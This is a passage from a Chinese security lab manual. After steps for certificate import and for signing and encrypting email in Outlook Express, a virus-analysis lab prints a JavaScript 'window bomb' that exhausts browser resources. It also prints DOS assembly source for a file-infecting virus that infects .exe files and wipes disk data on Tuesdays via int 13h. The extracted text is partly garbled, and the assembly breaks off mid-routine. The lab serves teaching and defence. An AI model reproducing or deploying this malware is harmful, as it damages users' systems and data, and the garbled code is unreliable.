【文章內(nèi)容簡介】 書導(dǎo)出后文件的文件名和路徑（如圖 9）。 16 此時顯示前面你所選擇的所有設(shè)置，如果覺得完全正確則點(diǎn)擊 “完成 ”，如有錯誤則點(diǎn)擊 “上一步 ”（如圖 10）。 導(dǎo)入證書及私鑰的操作步驟。 打開一個 IE 瀏覽器，工具 —Inter 選項(xiàng) —內(nèi)容 —證書（如圖 11）?；蛘?，開始 —設(shè)置 —控制面板 —Inter 選項(xiàng) —內(nèi)容 —證書（如圖 11）。 17 點(diǎn)擊 “導(dǎo)入 ”按鈕，此時會彈出證書導(dǎo)入向?qū)Вㄈ鐖D 12）。 點(diǎn)擊 “下一步 ”，根據(jù)向?qū)崾具x擇導(dǎo)入證書的文件名和路徑（如圖 13）。 18 選擇好以后點(diǎn)擊 “下一步 ”，此時為保護(hù)你的私鑰需要為你導(dǎo)入的證書的私鑰鍵入一個密碼（如圖 14）。 此時需要選擇導(dǎo)入證書的存儲區(qū)，可以由系統(tǒng)自動選擇也可以由用戶指定（如圖 15），系統(tǒng)默認(rèn)該證書是用戶自己的證書而存入 “個人證書 ”之中，而如果你要導(dǎo)入對方的證書（這主要發(fā)生在你要利用對方證書給對方發(fā)送加密郵件的時候），則應(yīng)該自己指定位置并選擇 “其他人 ”。 19 此時顯示前面你所選擇的所有設(shè)置，如果覺得完全正確則點(diǎn)擊 “完成 ”，如有錯誤則點(diǎn) 擊 “上一步 ”（如圖 16）。 （三）、利用數(shù)字證書對電子郵件進(jìn)行數(shù)字簽名和加密 使用 Outlook Express 可以對電子郵件進(jìn)行加密和數(shù)字簽名。對電子郵件進(jìn)行簽名需要一個屬于你自己的數(shù)字證書，而要對電子郵件進(jìn)行加密則需要擁有對方的數(shù)字證書。 配置 Outlook，建立你自己的賬號 （ 1）在 Outlook Express 中單擊菜單上的 “工具 ”—“賬號 ” 20 （ 2）點(diǎn)擊 “添加 ”?“郵件 ” （ 3）輸入顯示名稱 21 （ 4）輸入電子郵件地址 （ 5）設(shè)置接收郵件服務(wù)器和發(fā)送郵件服務(wù)器 （ 6）輸入電子郵箱的帳戶名稱和登錄密碼。 22 單擊 “下一步 ”，郵件設(shè)置成功。 （ 7）在 Outlook Express中，單擊 “工具 ”菜單中的 “帳戶 ”。 （ 8）選取 “郵件 ”選項(xiàng)卡中用于發(fā)送安全郵件的帳號，然后單擊 “屬性 ”。在屬性設(shè)置窗口中，選擇 “服務(wù)器 ”選項(xiàng)卡，勾選 “我的服務(wù)器要求身份驗(yàn)證 ”。 23 （ 9）選取安全選項(xiàng)卡，選擇簽名證書和加密證書及算法。 （ 10）在彈出的 “選擇默認(rèn)帳戶數(shù)字標(biāo)識 ”窗口中，選擇 要使用的數(shù)字證書。單擊 “確定 ”按鈕，完成證書設(shè)置。 （ 11）其他補(bǔ)充設(shè)置 24 如果你希望在服務(wù)器上保留郵件副本，則在帳戶屬性中，單擊 “高級 ”選項(xiàng)卡。勾選 “在服務(wù)器上保留郵件副本 ”。此時下邊設(shè)置細(xì)則的勾選項(xiàng)由禁止（灰色）變?yōu)榭蛇x（黑色）。 使用 Outlook 發(fā)送附數(shù)字簽名的電子郵件 （ 1）單擊 Outlook Express 窗口中的 “新郵件 ”按鈕，撰寫新郵件內(nèi)容，填寫好收件人郵箱地址和郵件主題。選取 “工具 ”菜單中的 “數(shù)字簽名 ”項(xiàng)或工具條上的 “簽名 ”按鈕，在郵件收件人的右側(cè)會出現(xiàn)一個紅色的 “簽名 ”標(biāo)牌，如圖所示。 （ 2）點(diǎn)擊新郵件窗口左邊的 “發(fā)送 ”按鈕。發(fā)出帶簽名的電子郵件。 25 （ 3）當(dāng)收件人收到并打開有數(shù)字簽名的郵件時，將看到 “數(shù)字簽名郵件 ”的提示信息（用戶可以設(shè)置下次不提示該信息），按 “繼續(xù) ”按鈕后，才 可閱讀到該郵件的內(nèi)容。若郵件在傳輸過程中被他人篡改或發(fā)信人的數(shù)字證書有問題，頁面將出現(xiàn) “安全警告 ”提示。在收件箱中，當(dāng)郵件未閱讀或簽名未檢查時，簽名證書標(biāo)志出現(xiàn)在未拆封信封圖標(biāo)（在發(fā)件人姓名前）的右側(cè)；當(dāng)雙擊郵件進(jìn)行安全檢查后，證書標(biāo)志出現(xiàn)在已拆封的信封圖標(biāo)的左側(cè)。 使用 Outlook 發(fā)送加密的電子郵件 （ 1）要發(fā)送加密電子郵件，你需要有收件人的數(shù)字證書。獲得收件人數(shù)字證書的方法可以是讓對方給你發(fā)送帶有其數(shù)字簽名的郵件。將該郵件打開后，在會右邊看到對方的證書標(biāo)志。單擊該標(biāo)識，找到 “安全 ”項(xiàng)，單擊 “查看 證書 ”按鈕，可以查看 “發(fā)件人證書 ”；單擊 “添加到通訊簿 ”按鈕，在通訊簿中保存發(fā)件人的加密首選項(xiàng)，這樣對方數(shù)字證書就被添加到你的通訊簿中。有了對方的數(shù)字證書，你就可以向?qū)Ψ桨l(fā)送加密郵件了。 26 （ 2）在 Outlook Express 6中撰寫新郵件或者回復(fù)已經(jīng)收到的郵件，寫好郵件內(nèi)容后，選取 “工具 ”菜單中的 “加密 ”項(xiàng)或單擊工具欄上的 “加密 ”按鈕，郵件的右側(cè)將會出現(xiàn)一個藍(lán)色的鎖型加密標(biāo)識。該郵件也可以同時使用發(fā)件人的數(shù)字簽名。 （ 3）當(dāng)收件人收到并打開已加密過的郵件時，將看到 加密郵件 的提示信息，按 “繼續(xù) ”按鈕后，可閱讀到該郵件的內(nèi)容。當(dāng)收到加密郵件時，完全有理由確認(rèn)郵件沒有被其他任何人閱讀或篡改過，因?yàn)橹挥性谑占俗约旱挠?jì)算機(jī)上安裝了正確的數(shù)字證書， Outlook Express 才能自動解密電子郵件；否則，郵件內(nèi)容將無法顯示。 27 實(shí)驗(yàn)五 計(jì)算機(jī)病毒 實(shí)驗(yàn) 【實(shí)驗(yàn)?zāi)康摹? 通過實(shí)驗(yàn)，鞏固學(xué)生對計(jì)算機(jī)病毒的基本知識的理解，掌握計(jì)算機(jī)病毒的基本機(jī)制。通過分析常見病毒的源代碼及實(shí)現(xiàn)機(jī)制，了解計(jì)算機(jī)病毒的特征 、運(yùn)行結(jié)構(gòu)和破壞機(jī)制，理解病毒的實(shí)現(xiàn)技術(shù)，在此基礎(chǔ)上掌握合理且具針對性的防范措施。 【實(shí)驗(yàn)學(xué)時】 2 學(xué)時。 【實(shí)驗(yàn)內(nèi)容和步驟】 對下列病毒原代碼進(jìn)行分析： “窗口炸彈”的源代碼 HTML HEAD TITLE炸彈來也 /TITLE META HTTPEQUIV=ContentType CONTENT=text/html。CHARSET=GB2312 /HEAD BODY onload=WindowBombDemo() SCRIPT LANGUAGE=JavaScript alert(39。39。如果你想避免炸彈的爆炸，給你一個機(jī)會試試：同時按動 Ctrl+Alt+Del 可能避免它的爆炸，如果你單擊〖確定〗按鈕則炸彈立刻爆炸?。?！ 39。) function WindowBombDemo() { var iCounter = 0 while (true) { (： //,CRASHING + iCounter,width=1,height=1,resizable=no) iCounter++ } } /SCRIPT /BODY /HTML HTML HEAD 當(dāng)對方雙擊該網(wǎng)頁文件后就會啟動 IE 瀏覽器，正在使用的瀏覽器窗口如雪崩般的增加，直至耗盡所有的資源。 該程序是一個模擬程序，在運(yùn)行之前會指示用戶可以使用 Ctrl + Alt + Del 鍵避免“窗口炸彈”的爆炸。如圖： 28 真正的病毒程序?qū)h除程序中的以下語句： alert(39。39。如果你想避免炸彈的爆炸，給你一個機(jī)會試試：同時按動 Ctrl+Alt+Del 可能避免它的爆炸，如果你單擊〖確定〗按鈕則炸彈立刻爆炸！?。?39。)， “窗口炸 彈”就會立刻爆炸?！按翱谡◤棥彼a(chǎn)生的無數(shù)窗口大約 3 厘米見方，既不能最大化也不能繼續(xù)顯示網(wǎng)頁內(nèi)容，只是雪片般飛來充斥瀏覽器的窗口中。 對文件型病毒源代碼進(jìn)行分析 CODE SEGMENT assume cs:code .386 100h start: mov cs:oldsp,sp 。 保存原程序的堆棧指針 mov cs:oldss,ss 。 mov sp,stack_end mov ax,cs 。 設(shè)置新的堆棧指針 mov ss,ax 。 push ds 。保存原 ds es push es 。 mov ds,ax mov es,ax sub ax,oldseg 。 算出原程序的入口 push ax 。 并保存入棧 push oldip 。 call setfile 。程序的核心部分 pop cs:oldip 。 取回原程序的入口 pop cs:oldseg 。 pop es 。 恢復(fù)原 es ds pop ds 。 29 mov sp,cs:oldss 。 恢復(fù)原 ss,sp mov ss,sp 。 mov sp,cs:oldsp 。 push oldseg 。跳回原程序入口點(diǎn) push oldip 。 retf 。 db 09ah getdate proc near 。這個函數(shù)是取得時間是否是星期二是則破壞硬盤數(shù)據(jù) mov ax,0ec32h 。 寫要執(zhí)行的代碼 int 13h not ax 。 到 @dest1 位置 mov si,@des1 。 這里既加密代碼 mov word ptr [si],ax 。 mov ah,2ah int 21h cmp al,2 jnz @gd_con mov ax,312h mov cx,1 mov dx,80h @des1: db 0ebh db 32 ret @gd_con: ret getdate endp setfile1 proc near call findfirst @sf_con: jc @sf_back call modify call findnext jmp @sf_con @sf_back: ret setfile1 endp setdata proc near push si push di push cx push ax pushf 30 mov si,offset normal1 mov di,si mov cx,23h @aaa2: lodsb not ax stosb loop @aaa2 popf pop ax pop cx pop di pop si ret setdata endp setfile proc near cmp ax,127h 。 沒有作用只是干撓 jnz @aaa1 。 ax 不可能等于 127h call dword ptr oldsp 。 ret 。 db 0e8h 。 @aaa: call getdate ret @aaa1: mov ah,01ah 。設(shè)置磁盤傳輸?shù)刂? mov dx,offset dta 。用于 findfirst int 21h 。 call setdata 。數(shù)據(jù)解密 push @aaa mov dx,offset normal1 。 找 *.exe mov ax,offset dta add ax,01eh mov fs,ax 。 fs 用于傳遞文件名的地址 call setfile1 。 傳染文件 mov dx,offset normal2 。 找 *. call setfile1 mov dx,offset bootcmd 。 找 c:\windows\ mov fs,dx call setfile1 mov dx,offset bootcmd1 。 找 c:\ mov si,dx 。 mov word ptr [si],39。:C39。 。 mov fs,dx 。 31 call setfile1 。 ret setfile endp db 09ah findfirst proc near mov ax,04e27h int 21h ret findfirst endp findnext proc near mov ah,04fh int 21h ret findnext endp modify proc near 。修改并感染程序 mov si,offset sbuffer 。可執(zhí)行的文件頭的地址 mov di,offset dta 。文件信息的地址 cmp dword ptr [di+01ah],1000 。 若文件小于 1K 或 大于 1M 不感染 jb @fn_ret 。 cmp dword ptr [di+01ah],0ffcffh 。 jae @fn_ret 。 mov dx,fs mov ax,4300h 。保存原文件屬性 int 21h 。再改為沒有屬性 push cx 。 mov ax,4301h xor cx,cx int 21h mov ax,03d02h 。 打開文件 int 21h 。 jc @fn_ret3 。 mov bx,ax 。 讀文件頭 mov ah,03fh 。 mov cx,1ch 。 mov dx,offset sbuffer 。 int 21h 。 cmp word ptr [si],39。ZM39。 。 如不是可執(zhí)行文件就不感染 jnz @fn_ret1 。 mov ax,word ptr [si+014h] 。 保存原程序入口 mov oldip,ax 。 mov ax,word ptr [si+016h] 。 mov oldseg,ax